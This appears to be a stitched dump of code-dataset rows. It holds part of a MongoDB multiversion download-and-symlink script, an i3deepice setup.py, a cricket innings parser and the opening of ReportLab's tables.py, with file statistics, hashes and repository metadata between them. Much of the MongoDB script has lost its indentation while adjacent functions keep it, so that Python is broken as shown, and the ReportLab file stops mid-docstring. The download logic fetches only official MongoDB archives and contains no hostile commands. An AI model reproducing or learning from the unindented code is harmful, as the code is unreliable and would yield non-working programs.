        parts = parts[:-1]

    if parts[-1].startswith("rc"):
        # Weight RCs below the eventual GA release so that e.g.
        # 2.6.0-rc1 < 2.6.0-rc2 < 2.6.0 sorts ascending.
        parts[-1] = int(parts[-1][2:]) + RC_OFFSET
    elif parts[0].startswith("v") and parts[-1] == "latest":
        # "<branchname>-latest" outweighs every concrete release of that branch.
        parts[0] = parts[0][1:]
        parts[-1] = float("inf")
    elif for_sorting:
        # Pad plain releases with a 0 so they compare against the RC weights.
        parts.append(0)

    return [float(piece) for piece in parts]
def download_file(url, file_name):
    """Fetch *url* into *file_name* using curl.

    Returns True on success; raises an Exception carrying curl's exit status
    when the transfer fails.
    """
    command = [
        "curl",
        "-L", "--silent",           # follow redirects, no progress meter
        "--retry", "5",
        "--retry-max-time", "600",
        "--max-time", "120",
        "-o", file_name,
        url,
    ]
    proc = subprocess.Popen(command,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    proc.communicate()
    # returncode may be unset/zero after communicate(); fall back to wait().
    error_code = proc.returncode or proc.wait()
    if not error_code:
        return True
    raise Exception("Failed to download %s with error %d" % (url, error_code))
class MultiVersionDownloader:
def __init__(self, install_dir, link_dir, edition, platform_arch, generic_arch='Linux/x86_64'):
self.install_dir = install_dir
self.link_dir = link_dir
self.edition = edition.lower()
self.platform_arch = platform_arch.lower().replace('/', '_')
self.generic_arch = generic_arch.lower().replace('/', '_')
self._links = None
self._generic_links = None
@property
def generic_links(self):
if self._generic_links is None:
self._links, self._generic_links = self.download_links()
return self._generic_links
@property
def links(self):
if self._links is None:
self._links, self._generic_links = self.download_links()
return self._links
def download_links(self):
temp_file = tempfile.mktemp()
download_file("https://downloads.mongodb.org/full.json", temp_file)
with open(temp_file) as f:
full_json = json.load(f)
os.remove(temp_file)
if 'versions' not in full_json:
raise Exception("No versions field in JSON: \n" + str(full_json))
links = {}
generic_links = {}
for json_version in full_json['versions']:
if 'version' in json_version and 'downloads' in json_version:
version = json_version['version']
for download in json_version['downloads']:
if 'target' in download and 'edition' in download:
if download['target'].lower() == self.platform_arch and \
download['edition'].lower() == self.edition:
links[version] = download['archive']['url']
elif download['target'].lower() == self.generic_arch and \
download['edition'].lower() == 'base':
generic_links[version] = download['archive']['url']
return links, generic_links
def download_version(self, version):
try:
os.makedirs(self.install_dir)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(self.install_dir):
pass
else: raise
urls = []
requested_version_parts = get_version_parts(version)
for link_version, link_url in self.links.iteritems():
link_version_parts = get_version_parts(link_version)
if link_version_parts[:len(requested_version_parts)] == requested_version_parts:
# The 'link_version' is a candidate for the requested 'version' if
# (a) it is a prefix of the requested version, or if
# (b) it is the "<branchname>-latest" version and the requested version is for a
# particular major release.
# This is equivalent to the 'link_version' having components equal to all of the
# version parts that make up 'version'.
if "-" in version:
# The requested 'version' contains a hyphen, so we only consider exact matches
# to that version.
if link_version != version:
continue
urls.append((link_version, link_url))
if len(urls) == 0:
print >> sys.stderr, ("Cannot find a link for version %s, versions %s found."
% (version, self.links))
for ver, generic_url in self.generic_links.iteritems():
parts = get_version_parts(ver)
if parts[:len(requested_version_parts)] == requested_version_parts:
if "-" in version and ver != version:
continue
urls.append((ver, generic_url))
if len(urls) == 0:
raise Exception(
"No fall-back generic link available or version %s." % version)
else:
print "Falling back to generic architecture."
urls.sort(key=lambda (version, _): get_version_parts(version, for_sorting=True))
full_version = urls[-1][0]
url = urls[-1][1]
extract_dir = url.split("/")[-1][:-4]
file_suffix = os.path.splitext(urlparse.urlparse(url).path)[1]
# only download if we don't already have the directory
already_downloaded = os.path.isdir(os.path.join( self.install_dir, extract_dir))
if already_downloaded:
print "Skipping download for version %s (%s) since the dest already exists '%s'" \
% (version, full_version, extract_dir)
else:
print "Downloading data for version %s (%s)..." % (version, full_version)
print "Download url is %s" % url
temp_dir = tempfile.mkdtemp()
temp_file = tempfile.mktemp(suffix=file_suffix)
download_file(url, temp_file)
print "Uncompressing data for version %s (%s)..." % (version, full_version)
first_file = ''
if file_suffix == ".zip":
# Support .zip downloads, used for Windows binaries.
with zipfile.ZipFile(temp_file) as zf:
# Use the name of the root directory in the archive as the name of the directory
# to extract the binaries into inside 'self.install_dir'. The name of the root
# directory nearly always matches the parsed URL text, with the exception of
# versions such as "v3.2-latest" that instead contain the githash.
first_file = zf.namelist()[0]
zf.extractall(temp_dir)
elif file_suffix == ".tgz":
# Support .tgz downloads, used for Linux binaries.
with closing(tarfile.open(temp_file, 'r:gz')) as tf:
# Use the name of the root directory in the archive as the name of the directory
# to extract the binaries into inside 'self.install_dir'. The name of the root
# directory nearly always matches the parsed URL text, with the exception of
# versions such as "v3.2-latest" that instead contain the githash.
first_file = tf.getnames()[0]
tf.extractall(path=temp_dir)
else:
raise Exception("Unsupported file extension %s" % file_suffix)
# Sometimes the zip will contain the root directory as the first file and
# os.path.dirname() will return ''.
extract_dir = os.path.dirname(first_file)
if not extract_dir:
extract_dir = first_file
temp_install_dir = os.path.join(temp_dir, extract_dir)
# We may not have been able to determine whether we already downloaded the requested
# version due to the ambiguity in the parsed URL text, so we check for it again using
# the adjusted 'extract_dir' value.
already_downloaded = os.path.isdir(os.path.join(self.install_dir, extract_dir))
if not already_downloaded:
shutil.move(temp_install_dir, self.install_dir)
shutil.rmtree(temp_dir)
os.remove(temp_file)
self.symlink_version(version, os.path.abspath(os.path.join(self.install_dir, extract_dir)))
    def symlink_version(self, version, installed_dir):
        """Create versioned symlinks in self.link_dir for every binary under
        installed_dir/bin, e.g. bin/mongod -> link_dir/mongod-2.4.9.

        Pre-existing links are left untouched; other OS errors propagate.
        """
        try:
            os.makedirs(self.link_dir)
        except OSError as exc:
            # Ignore "already exists" only when it really is a directory.
            if exc.errno == errno.EEXIST and os.path.isdir(self.link_dir):
                pass
            else: raise
        for executable in os.listdir(os.path.join(installed_dir, "bin")):
            # Build e.g. "mongod-2.4.9" (extension kept for Windows .exe).
            executable_name, executable_extension = os.path.splitext(executable)
            link_name = "%s-%s%s" % (executable_name, version, executable_extension)
            try:
                executable = os.path.join(installed_dir, "bin", executable)
                executable_link = os.path.join(self.link_dir, link_name)
                if os.name == "nt":
                    # os.symlink is not supported on Windows, use a direct method instead.
                    # NOTE(review): this permanently monkey-patches os.symlink
                    # for the rest of the process the first time it runs.
                    def symlink_ms(source, link_name):
                        import ctypes
                        csl = ctypes.windll.kernel32.CreateSymbolicLinkW
                        csl.argtypes = (ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
                        csl.restype = ctypes.c_ubyte
                        # flag 1 = directory link, 0 = file link
                        flags = 1 if os.path.isdir(source) else 0
                        if csl(link_name, source.replace('/', '\\'), flags) == 0:
                            raise ctypes.WinError()
                    os.symlink = symlink_ms
                os.symlink(executable, executable_link)
            except OSError as exc:
                # A link left over from a previous run is fine; anything else is fatal.
                if exc.errno == errno.EEXIST:
                    pass
                else: raise
CL_HELP_MESSAGE = \
"""
Downloads and installs particular mongodb versions (each binary is renamed to include its version)
into an install directory and symlinks the binaries with versions to another directory. This script
supports community and enterprise builds.
Usage: setup_multiversion_mongodb.py INSTALL_DIR LINK_DIR EDITION PLATFORM_AND_ARCH VERSION1 [VERSION2 VERSION3 ...]
EDITION is one of the following:
base (generic community builds)
enterprise
targeted (platform specific community builds, includes SSL)
PLATFORM_AND_ARCH can be specified with just a platform, i.e., OSX, if it is supported.
Ex: setup_multiversion_mongodb.py ./install ./link base "Linux/x86_64" "2.0.6" "2.0.3-rc0" "2.0" "2.2" "2.3"
Ex: setup_multiversion_mongodb.py ./install ./link enterprise "OSX" "2.4" "2.2"
After running the script you will have a directory structure like this:
./install/[mongodb-osx-x86_64-2.4.9, mongodb-osx-x86_64-2.2.7]
./link/[mongod-2.4.9, mongod-2.2.7, mongo-2.4.9...]
You should then add ./link/ to your path so multi-version tests will work.
Note: If "rc" is included in the version name, we'll use the exact rc, otherwise we'll pull the highest non-rc
version compatible with the version specified.
"""
def parse_cl_args(args):
def raise_exception(msg):
print CL_HELP_MESSAGE
raise Exception(msg)
if len(args) == 0: raise_exception("Missing INSTALL_DIR")
install_dir = args[0]
args = args[1:]
if len(args) == 0: raise_exception("Missing LINK_DIR")
link_dir = args[0]
args = args[1:]
if len(args) == 0: raise_exception("Missing EDITION")
edition = args[0]
if edition not in ['base', 'enterprise', 'targeted']:
raise Exception("Unsupported edition %s" % edition)
args = args[1:]
if len(args) == 0: raise_exception("Missing PLATFORM_AND_ARCH")
platform_arch = args[0]
args = args[1:]
if len(args) == 0: raise_exception("Missing VERSION1")
versions = args
return (MultiVersionDownloader(install_dir, link_dir, edition, platform_arch), versions)
def main():
# Listen for SIGUSR1 and dump stack if received.
try:
signal.signal(signal.SIGUSR1, dump_stacks)
except AttributeError:
print "Cannot catch signals on Windows"
downloader, versions = parse_cl_args(sys.argv[1:])
for version in versions:
downloader.download_version(version)
# Script entry point.
if __name__ == '__main__':
    main()
| 40.874652
| 116
| 0.602699
|
4a0a2750c0f9d65fca60a75bc1e765c892e3a586
| 1,274
|
py
|
Python
|
setup.py
|
tglauch/DeepIceLearning_Module
|
8c05929ec97226f07ab9e13a1dfc539d0e47a2b1
|
[
"MIT"
] | 3
|
2019-10-10T22:02:47.000Z
|
2020-03-17T08:39:35.000Z
|
setup.py
|
tglauch/DeepIceLearning_Module
|
8c05929ec97226f07ab9e13a1dfc539d0e47a2b1
|
[
"MIT"
] | null | null | null |
setup.py
|
tglauch/DeepIceLearning_Module
|
8c05929ec97226f07ab9e13a1dfc539d0e47a2b1
|
[
"MIT"
] | 1
|
2020-05-11T15:49:46.000Z
|
2020-05-11T15:49:46.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Packaging configuration for the i3deepice IceTray module."""
import setuptools

with open("README.md") as readme:
    long_description = readme.read()

# Trove classifiers describing the supported environments.
_CLASSIFIERS = [
    "Development Status :: 4 - Beta",
    "Intended Audience :: Science/Research",
    "License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
    "Operating System :: Unix",
    "Programming Language :: Python :: 2.7",
    "Topic :: Scientific/Engineering",
]

setuptools.setup(
    name="i3deepice",
    version="0.1",
    author="Theo Glauch",
    author_email="theo.glauch@tum.de",
    description="DeepIceLearning Icetray Module",
    long_description=long_description,
    long_description_content_type="text/x-rst",
    url="https://github.com/tglauch/i3deepice/",
    project_urls={
        "Source": "https://github.com/tglauch/i3deepice/",
        "Tracker": "https://github.com/tglauch/i3deepice/issues/",
    },
    license="GPLv3",
    classifiers=_CLASSIFIERS,
    python_requires=">=2.7",
    install_requires=[
        'tensorflow>=1.5,<2.0',
        'numpy>1.14',
        'scipy>1.2.0',
    ],
    packages=setuptools.find_packages(),
    # Ship trained model weights and configs alongside the code.
    package_data={"i3deepice": ["models/*/*.npy",
                                "models/*/*.cfg",
                                "lib/*.npy"]},
)
| 30.333333
| 75
| 0.579278
|
4a0a28c8b18ab62856e7813e1b2497cf81e4c210
| 830
|
py
|
Python
|
cricket_db/parsers/innings.py
|
oli5679/cricsheet-db
|
be4f3d518afc9e3012e03c45166c446467abca73
|
[
"MIT"
] | 2
|
2020-01-21T10:50:35.000Z
|
2020-12-28T11:09:20.000Z
|
cricket_db/parsers/innings.py
|
berianjames/cricsheet-db
|
be4f3d518afc9e3012e03c45166c446467abca73
|
[
"MIT"
] | null | null | null |
cricket_db/parsers/innings.py
|
berianjames/cricsheet-db
|
be4f3d518afc9e3012e03c45166c446467abca73
|
[
"MIT"
] | 2
|
2020-01-21T10:57:16.000Z
|
2020-05-31T19:13:11.000Z
|
from cricket_db.parsers.parser import Parser
class InningsParser(Parser):
    """Flattens one innings of a raw cricsheet match record into a dict."""

    def __init__(self, match_id, innings_number):
        self.match_id = match_id
        self.innings_number = innings_number

    def parse(self, raw):
        """Return the innings row; penalty-run fields only when present."""
        record = {
            'match_id': self.match_id,
            'innings_number': self.innings_number,
            'batting_team': raw['team'],
            'was_declared': ('declared' in raw),
        }
        if 'penalty_runs' in raw:
            record.update(self.__penalty_runs_parser(raw['penalty_runs']))
        return record

    def __penalty_runs_parser(self, penalty_runs):
        # Either of 'pre'/'post' may be absent; missing ones map to None.
        return {
            'penalty_runs_pre': penalty_runs.get('pre'),
            'penalty_runs_post': penalty_runs.get('post'),
        }
| 33.2
| 89
| 0.626506
|
4a0a298f54dafddcb2464359bb01b641473951e1
| 66,188
|
py
|
Python
|
dist-packages/reportlab/platypus/tables.py
|
Jianwei-Wang/python2.7_lib
|
911b8e81512e5ac5f13e669ab46f7693ed897378
|
[
"PSF-2.0"
] | 1
|
2020-10-30T14:47:11.000Z
|
2020-10-30T14:47:11.000Z
|
dist-packages/reportlab/platypus/tables.py
|
Jianwei-Wang/python2.7_lib
|
911b8e81512e5ac5f13e669ab46f7693ed897378
|
[
"PSF-2.0"
] | 7
|
2021-02-08T20:22:15.000Z
|
2022-03-11T23:19:41.000Z
|
dist-packages/reportlab/platypus/tables.py
|
Jianwei-Wang/python2.7_lib
|
911b8e81512e5ac5f13e669ab46f7693ed897378
|
[
"PSF-2.0"
] | null | null | null |
#Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/tables.py
__version__=''' $Id$ '''
__doc__="""
Tables are created by passing the constructor a tuple of column widths, a tuple of row heights and the data in
row order. Drawing of the table can be controlled by using a TableStyle instance. This allows control of the
color and weight of the lines (if any), and the font, alignment and padding of the text.
None values in the sequence of row heights or column widths, mean that the corresponding rows
or columns should be automatically sized.
All the cell values should be convertible to strings; embedded newline '\\n' characters
cause the value to wrap (ie are like a traditional linefeed).
See the test output from running this module as a script for a discussion of the method for constructing
tables and table styles.
"""
from reportlab.platypus.flowables import Flowable, Preformatted, Spacer
from reportlab import rl_config
from reportlab.lib.styles import PropertySet, ParagraphStyle, _baseFontName
from reportlab.lib import colors
from reportlab.lib.utils import annotateException, IdentStr, flatten, isStr, asNative, strTypes
from reportlab.lib.rl_accel import fp_str
from reportlab.lib.abag import ABag as CellFrame
from reportlab.pdfbase.pdfmetrics import stringWidth
from reportlab.platypus.doctemplate import Indenter
from reportlab.platypus.flowables import LIIndenter
# Map style-command cap/join names to the integer codes used by the canvas;
# None passes through to mean "leave the canvas default unchanged".
LINECAPS={None: None, 'butt':0,'round':1,'projecting':2,'squared':2}
LINEJOINS={None: None, 'miter':0, 'mitre':0, 'round':1,'bevel':2}
class CellStyle(PropertySet):
    """Per-cell formatting defaults used by Table.

    Instances shadow any of these class-level defaults with instance
    attributes; Table creates one per cell, named by its (row, col).
    """
    fontname = _baseFontName
    fontsize = 10
    leading = 12
    leftPadding = 6
    rightPadding = 6
    topPadding = 3
    bottomPadding = 3
    firstLineIndent = 0
    color = 'black'
    alignment = 'LEFT'
    background = 'white'
    valign = "BOTTOM"
    href = None
    destination = None
    def __init__(self, name, parent=None):
        # Optionally seed this style from a parent by copying its attributes.
        self.name = name
        if parent is not None:
            parent.copy(self)
    def copy(self, result=None):
        # Copy every attribute reachable on self onto result.
        # NOTE(review): dir(self) also includes methods and dunders, so those
        # get re-bound on the target as instance attributes; and the
        # result=None default looks unusable -- CellStyle() requires a name --
        # every visible caller passes result explicitly.
        if result is None:
            result = CellStyle()
        for name in dir(self):
            setattr(result, name, getattr(self, name))
        return result
class TableStyle:
    """An ordered list of table formatting command tuples, optionally
    inheriting the commands (and spaceBefore/spaceAfter) of a parent style."""
    def __init__(self, cmds=None, parent=None, **kw):
        #handle inheritance from parent first.
        commands = []
        if parent:
            # copy the parents list at construction time
            commands = commands + parent.getCommands()
            self._opts = parent._opts
            for a in ('spaceBefore','spaceAfter'):
                if hasattr(parent,a):
                    setattr(self,a,getattr(parent,a))
        if cmds:
            commands = commands + list(cmds)
        self._cmds = commands
        # NOTE(review): this unconditionally replaces the parent._opts
        # assigned above, so only the keyword arguments actually survive.
        self._opts={}
        self._opts.update(kw)
    def add(self, *cmd):
        """Append one command tuple, e.g. ('GRID', (0,0), (-1,-1), 1, red)."""
        self._cmds.append(cmd)
    def __repr__(self):
        return "TableStyle(\n%s\n) # end TableStyle" % "  \n".join(map(repr, self._cmds))
    def getCommands(self):
        """Return the accumulated command list (shared, not a copy)."""
        return self._cmds
def _rowLen(x):
return not isinstance(x,(tuple,list)) and 1 or len(x)
def _calc_pc(V, avail):
    '''check list V for percentage or * values
    1) absolute values go through unchanged
    2) percentages are used as weights for unconsumed space
    3) if no None values were seen '*' weights are
    set equally with unclaimed space
    otherwise * weights are assigned as None'''
    out = []
    pct_idx = []        # positions of percentage entries in out
    star_idx = []       # positions of '*' entries in out
    unclaimed = avail   # space not consumed by absolute widths
    pct_sum = 0.
    n_none = 0.
    for spec in V:
        if isinstance(spec, strTypes):
            spec = str(spec).strip()
            if not spec:
                spec = None
                n_none += 1
            elif spec.endswith('%'):
                spec = float(spec[:-1])
                pct_sum += spec
                pct_idx.append(len(out))
            elif spec == '*':
                star_idx.append(len(out))
            else:
                spec = float(spec)
                unclaimed -= spec
        elif spec is None:
            n_none += 1
        else:
            unclaimed -= spec
        out.append(spec)
    unclaimed = max(0., unclaimed)
    # Percentages are weights over the unconsumed space, treated as at
    # least 100% so over-subscription degrades gracefully.
    scale = unclaimed / max(100., pct_sum)
    for k in pct_idx:
        out[k] *= scale
        unclaimed -= out[k]
    unclaimed = max(0., unclaimed)
    if star_idx:
        # NOTE: the and/or idiom makes a zero share come out as None as well;
        # kept deliberately to match the historical behaviour.
        share = n_none == 0 and unclaimed / len(star_idx) or None
        for k in star_idx:
            out[k] = share
    return out
def _hLine(canvLine, scp, ecp, y, hBlocks, FUZZ=rl_config._FUZZ):
    '''
    Draw horizontal lines; do not draw through regions specified in hBlocks
    This also serves for vertical lines with a suitable canvLine
    '''
    blocks = hBlocks.get(y, None) if hBlocks else None
    # Fast path: no blocked regions overlap [scp, ecp] at all.
    if not blocks or scp >= blocks[-1][1]-FUZZ or ecp <= blocks[0][0]+FUZZ:
        canvLine(scp, y, ecp, y)
        return
    pos = scp
    for x0, x1 in blocks:
        if pos >= ecp - FUZZ:
            break
        if x1 <= pos + FUZZ or x0 >= ecp - FUZZ:
            continue            # this block lies wholly outside what's left
        seg_end = max(pos, x0)  # draw up to the start of the blocked region
        if seg_end > pos:
            canvLine(pos, y, seg_end, y)
        pos = min(ecp, x1)      # resume after the blocked region
    if pos < ecp - FUZZ:
        canvLine(pos, y, ecp, y)
def _multiLine(scp,ecp,y,canvLine,ws,count):
offset = 0.5*(count-1)*ws
y += offset
for idx in range(count):
canvLine(scp, y, ecp, y)
y -= ws
def _convert2int(value, map, low, high, name, cmd):
'''private converter tries map(value) low<=int(value)<=high or finally an error'''
try:
return map[value]
except KeyError:
try:
ivalue = int(value)
if low<=ivalue<=high: return ivalue
except:
pass
raise ValueError('Bad %s value %s in %s'%(name,value,ascii(cmd)))
def _endswith(obj,s):
try:
return obj.endswith(s)
except:
return 0
def spanFixDim(V0, V, spanCons, lim=None, FUZZ=rl_config._FUZZ):
    """Grow variable rows/columns (None in V0) so every span constraint in
    spanCons ((start, end) -> required total) is met, sharing the shortfall
    equally among the variable entries of each span.  V is mutated in place.
    """
    extra = {}                          # index -> accumulated growth
    if not lim: lim = len(V0)           # in longtables the row calcs may be truncated
    for (x0, x1), need in spanCons.items():
        if x0 >= lim:
            continue
        stop = x1 + 1
        have = sum([V[k] + extra.get(k, 0) for k in range(x0, stop)])
        if have >= need - FUZZ:
            continue                    # already good enough
        variable = [k for k in range(x0, stop) if V0[k] is None]
        if not variable:
            continue                    # nothing adjustable in this span
        share = (need - have) / float(len(variable))
        for k in variable:
            extra[k] = extra.get(k, 0) + share
    for k, grow in extra.items():
        V[k] += grow
class _ExpandedCellTuple(tuple):
    # Marker subclass: tags a cell value sequence that has already been run
    # through Table._cellListProcess so it is not expanded a second time.
    pass
class Table(Flowable):
    def __init__(self, data, colWidths=None, rowHeights=None, style=None,
                repeatRows=0, repeatCols=0, splitByRow=1, emptyTableAction=None, ident=None,
                hAlign=None,vAlign=None, normalizedData=0, cellStyles=None):
        """Build a table from row-major cell data.

        colWidths/rowHeights may be scalars (applied to every column/row) or
        sequences whose entries can be numbers, None, '*' or 'nn%' for
        automatic sizing.  emptyTableAction ('error'|'indicate'|'ignore')
        controls what happens for a table with no rows or columns.
        normalizedData=1 skips the string-coercion pass over data.
        """
        self.ident = ident
        self.hAlign = hAlign or 'CENTER'
        self.vAlign = vAlign or 'MIDDLE'
        if not isinstance(data,(tuple,list)):
            raise ValueError("%s invalid data type" % self.identity())
        self._nrows = nrows = len(data)
        self._cellvalues = []
        _seqCW = isinstance(colWidths,(tuple,list))
        _seqRH = isinstance(rowHeights,(tuple,list))
        # Column count comes from the widest data row, or from colWidths for
        # a rowless table.
        if nrows: self._ncols = ncols = max(list(map(_rowLen,data)))
        elif colWidths and _seqCW: ncols = len(colWidths)
        else: ncols = 0
        if not emptyTableAction: emptyTableAction = rl_config.emptyTableAction
        self._longTableOptimize = getattr(self,'_longTableOptimize',rl_config.longTableOptimize)
        if not (nrows and ncols):
            # Degenerate table: either fail, render a visible placeholder, or
            # silently collapse to a zero-size Spacer (by re-classing self).
            if emptyTableAction=='error':
                raise ValueError("%s must have at least a row and column" % self.identity())
            elif emptyTableAction=='indicate':
                # Morph into a Preformatted flowable showing the dimensions
                # in red on yellow so the problem is visible in output.
                self.__class__ = Preformatted
                global _emptyTableStyle
                if '_emptyTableStyle' not in list(globals().keys()):
                    _emptyTableStyle = ParagraphStyle('_emptyTableStyle')
                    _emptyTableStyle.textColor = colors.red
                    _emptyTableStyle.backColor = colors.yellow
                Preformatted.__init__(self,'%s(%d,%d)' % (self.__class__.__name__,nrows,ncols), _emptyTableStyle)
            elif emptyTableAction=='ignore':
                # Morph into an invisible zero-size Spacer.
                self.__class__ = Spacer
                Spacer.__init__(self,0,0)
            else:
                raise ValueError('%s bad emptyTableAction: "%s"' % (self.identity(),emptyTableAction))
            return
        # we need a cleanup pass to ensure data is strings - non-unicode and non-null
        if normalizedData:
            self._cellvalues = data
        else:
            self._cellvalues = data = self.normalizeData(data)
        if not _seqCW: colWidths = ncols*[colWidths]
        elif len(colWidths)!=ncols:
            if rl_config.allowShortTableRows and isinstance(colWidths,list):
                # Pad with the last given width, or truncate, instead of failing.
                n = len(colWidths)
                if n<ncols:
                    colWidths[n:] = (ncols-n)*[colWidths[-1]]
                else:
                    colWidths = colWidths[:ncols]
            else:
                raise ValueError("%s data error - %d columns in data but %d in column widths" % (self.identity(),ncols, len(colWidths)))
        if not _seqRH: rowHeights = nrows*[rowHeights]
        elif len(rowHeights) != nrows:
            raise ValueError("%s data error - %d rows in data but %d in row heights" % (self.identity(),nrows, len(rowHeights)))
        for i,d in enumerate(data):
            n = len(d)
            if n!=ncols:
                if rl_config.allowShortTableRows and isinstance(d,list):
                    # Right-pad short rows with empty strings.
                    d[n:] = (ncols-n)*['']
                else:
                    raise ValueError("%s expected %d not %d columns in row %d!" % (self.identity(),ncols,n,i))
        self._rowHeights = self._argH = rowHeights
        self._colWidths = self._argW = colWidths
        if cellStyles is None:
            # One CellStyle per cell, named by its (row, col) coordinates.
            cellrows = []
            for i in range(nrows):
                cellcols = []
                for j in range(ncols):
                    cellcols.append(CellStyle(repr((i,j))))
                cellrows.append(cellcols)
            self._cellStyles = cellrows
        else:
            self._cellStyles = cellStyles
        self._bkgrndcmds = []
        self._linecmds = []
        self._spanCmds = []
        self._nosplitCmds = []
        self.repeatRows = repeatRows
        self.repeatCols = repeatCols
        self.splitByRow = splitByRow
        if style:
            self.setStyle(style)
def __repr__(self):
"incomplete, but better than nothing"
r = getattr(self,'_rowHeights','[unknown]')
c = getattr(self,'_colWidths','[unknown]')
cv = getattr(self,'_cellvalues','[unknown]')
import pprint
cv = pprint.pformat(cv)
cv = cv.replace("\n", "\n ")
return "%s(\n rowHeights=%s,\n colWidths=%s,\n%s\n) # end table" % (self.__class__.__name__,r,c,cv)
def normalizeData(self, data):
"""Takes a block of input data (list of lists etc.) and
- coerces unicode strings to non-unicode UTF8
- coerces nulls to ''
-
"""
def normCell(stuff):
if stuff is None:
return ''
elif isStr(stuff):
return asNative(stuff)
else:
return stuff
outData = []
for row in data:
outRow = [normCell(cell) for cell in row]
outData.append(outRow)
from pprint import pprint as pp
#pp(outData)
return outData
    def identity(self, maxLen=30):
        '''Identify our selves as well as possible'''
        if self.ident: return self.ident
        vx = None
        nr = getattr(self,'_nrows','unknown')
        nc = getattr(self,'_ncols','unknown')
        cv = getattr(self,'_cellvalues',None)
        rh = getattr(self, '_rowHeights', None)
        if cv and 'unknown' not in (nr,nc):
            # Scan for the first cell whose content yields a usable identity
            # string; b is a "found it" flag used to break out of both loops.
            b = 0
            for i in range(nr):
                for j in range(nc):
                    v = cv[i][j]
                    if isinstance(v,(list,tuple,Flowable)):
                        if not isinstance(v,(tuple,list)): v = (v,)
                        r = ''
                        for vij in v:
                            r = vij.identity(maxLen)
                            # An identity ending '>...' is a truncated
                            # placeholder; keep looking for a better one.
                            if r and r[-4:]!='>...':
                                break
                        if r and r[-4:]!='>...':
                            ix, jx, vx, b = i, j, r, 1
                    else:
                        v = v is None and '' or str(v)
                        ix, jx, vx = i, j, v
                        # Only a non-empty plain string counts as "found".
                        b = (vx and isinstance(v,strTypes)) and 1 or 0
                    if maxLen: vx = vx[:maxLen]
                    if b: break
                if b: break
        if rh: #find tallest row, it's of great interest'
            tallest = '(tallest row %d)' % int(max(rh))
        else:
            tallest = ''
        if vx:
            vx = ' with cell(%d,%d) containing\n%s' % (ix,jx,repr(vx))
        else:
            vx = '...'
        return "<%s@0x%8.8X %s rows x %s cols%s>%s" % (self.__class__.__name__, id(self), nr, nc, tallest, vx)
def _cellListIter(self,C,aW,aH):
canv = getattr(self,'canv',None)
for c in C:
if getattr(c,'__split_only__',None):
for d in c.splitOn(canv,aW,aH):
yield d
else:
yield c
    def _cellListProcess(self,C,aW,aH):
        # Expand a cell's flowable list exactly once: consume Indenter
        # commands into a running indent state and wrap the flowables that
        # follow in LIIndenter; tag the result as _ExpandedCellTuple so a
        # second call is a no-op.
        if not isinstance(C,_ExpandedCellTuple):
            frame = None    # current extra-indent state set by Indenter cmds
            R = [].append
            for c in self._cellListIter(C,aW,aH):
                if isinstance(c,Indenter):
                    if not frame:
                        frame = CellFrame(_leftExtraIndent=0,_rightExtraIndent=0)
                    c.frameAction(frame)
                    # Once both indents return to ~0, stop wrapping.
                    if frame._leftExtraIndent<1e-8 and frame._rightExtraIndent<1e-8:
                        frame = None
                    continue
                if frame:
                    R(LIIndenter(c,leftIndent=frame._leftExtraIndent,rightIndent=frame._rightExtraIndent))
                else:
                    R(c)
            C = _ExpandedCellTuple(R.__self__)
        return C
    def _listCellGeom(self, V,w,s,W=None,H=None,aH=72000):
        """Wrap each flowable in V into width w (minus the padding from cell
        style s) and return (max wrapped width, total height).

        The first flowable's space-before and the last one's space-after are
        excluded from the total.  Optional W/H lists collect the individual
        wrapped sizes.
        """
        if not V: return 0,0
        aW = w - s.leftPadding - s.rightPadding
        aH = aH - s.topPadding - s.bottomPadding
        t = 0
        w = 0
        canv = getattr(self,'canv',None)
        sb0 = None   # space-before of the first flowable
        for v in V:
            vw, vh = v.wrapOn(canv, aW, aH)
            sb = v.getSpaceBefore()
            sa = v.getSpaceAfter()
            if W is not None: W.append(vw)
            if H is not None: H.append(vh)
            w = max(w,vw)
            t += vh + sa + sb
            if sb0 is None:
                sb0 = sb
        # sa still holds the last flowable's space-after here.
        return w, t - sb0 - sa
def _listValueWidth(self,V,aH=72000,aW=72000):
if not V: return 0,0
t = 0
w = 0
canv = getattr(self,'canv',None)
return max([v.wrapOn(canv,aW,aH)[0] for v in V])
    def _calc_width(self,availWidth,W=None):
        """Resolve self._colWidths and self._colpositions, computing any
        None column widths from the widest cell content; runs only once."""
        if getattr(self,'_width_calculated_once',None): return
        #comments added by Andy to Robin's slightly terse variable names
        if not W: W = _calc_pc(self._argW,availWidth) #widths array
        if None in W:  #some column widths are not given
            canv = getattr(self,'canv',None)
            saved = None
            if self._spanCmds:
                colSpanCells = self._colSpanCells
                spanRanges = self._spanRanges
            else:
                colSpanCells = ()
                spanRanges = {}
            spanCons = {}   # (col0,col1) -> min total width needed by a span
            # Work on a copy so the caller's widths list is not mutated.
            if W is self._argW:
                W0 = W
                W = W[:]
            else:
                W0 = W[:]
            V = self._cellvalues
            S = self._cellStyles
            while None in W:
                j = W.index(None) #find first unspecified column
                w = 0
                for i,Vi in enumerate(V):
                    v = Vi[j]
                    s = S[i][j]
                    ji = j,i
                    span = spanRanges.get(ji,None)
                    if ji in colSpanCells and not span: #if the current cell is part of a spanned region,
                        t = 0.0 #assume a zero size.
                    else:#work out size
                        t = self._elementWidth(v,s)
                        if t is None:
                            raise ValueError("Flowable %s in cell(%d,%d) can't have auto width\n%s" % (v.identity(30),i,j,self.identity(30)))
                        t += s.leftPadding+s.rightPadding
                        if span:
                            c0 = span[0]
                            c1 = span[2]
                            if c0!=c1:
                                # Width needed by a multi-column span is
                                # distributed later by spanFixDim.
                                x = c0,c1
                                spanCons[x] = max(spanCons.get(x,t),t)
                                t = 0
                    if t>w: w = t #record a new maximum
                W[j] = w
            if spanCons:
                try:
                    spanFixDim(W0,W,spanCons)
                except:
                    annotateException('\nspanning problem in %s\nW0=%r W=%r\nspanCons=%r' % (self.identity(),W0,W,spanCons))
        self._colWidths = W
        width = 0
        self._colpositions = [0]        #index -1 is right side boundary; we skip when processing cells
        for w in W:
            width = width + w
            self._colpositions.append(width)
        self._width = width
        self._width_calculated_once = 1
    def _elementWidth(self,v,s):
        """Best-effort width of one cell value under cell style s.

        Returns None for a flowable whose width cannot be determined, which
